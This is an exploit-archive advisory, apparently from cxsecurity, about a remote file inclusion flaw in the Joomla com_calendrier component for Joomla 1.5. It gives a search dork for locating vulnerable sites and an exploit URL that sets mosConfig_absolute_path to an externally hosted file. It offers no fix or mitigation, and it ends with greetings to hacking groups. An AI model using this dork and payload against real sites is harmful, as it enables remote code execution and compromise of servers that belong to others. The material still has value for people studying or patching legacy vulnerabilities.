The Joomla Calendrier component remote file inclusion vulnerability

2010.10.27
Credit: jos_ali_joe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================= Joomla Component com_calendrier RFI Vulnerability ========================================================= [+]Title : Joomla Component com_calendrier RFI Vulnerability [+]Author : jos_ali_joe [+]Contact : josalijoe@yahoo.com [+]Home : http://josalijoe.wordpress.com/ ######################################################################## Dork : inurl:index.php?option="com_calendrier" ######################################################################## [ Software Information ] ######################################################################## [+] Vendor : http://extensions.joomla.org/ [+] Archive : http://extensions.joomla.org/extensions/calendars-a-events [+] version : Joomla 1.5 [+] Vulnerability : RFI [+] Dork : com_calendrier ######################################################################## ========================================================================== RFI Exploit Exploit : http://example.com/index.php?option=com_calendrier&Itemid=&mosConfig_absolute_path=[ packetstormsecurity ] ========================================================================== #################################################################################### a little story from my before thank you for the admin and staff packetstorm security who already receive exploit archive from newbie jos_ali_joe I do not have the kind of teacher or her My teacher just google and my brother who has been guiding me. N4ck0 - Aury - TeRRenJr - ArRay I will create a spirit of looking for bugs / dork and submit the packetstorm security. Thanks for packetstorm security \m/ #################################################################################### Thanks : ./kaMtiEz � ibl13Z � Xrobot � tukulesto � R3m1ck � jundab - asickboys- Vyc0d � Yur4kha - XPanda - eL Farhatz ./ArRay � akatsuchi � K4pt3N � Gameover � antitos � yuki � pokeng � ffadill - Alecs - v3n0m - RJ45 ./Kiddies � pL4nkt0n � chaer newbie � andriecom � Abu_adam � Petimati - hakz � Virgi � Anharku - a17z a.k.a maho ./Me Family ATeN4 : ./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe Greets For : ./Devilzc0de crew � Kebumen Cyber � Explore Crew � Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Wannabe Hacker My Team : ./Indonesian Coder Special Thanks To : /. Admin and Staff packetstorm security


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top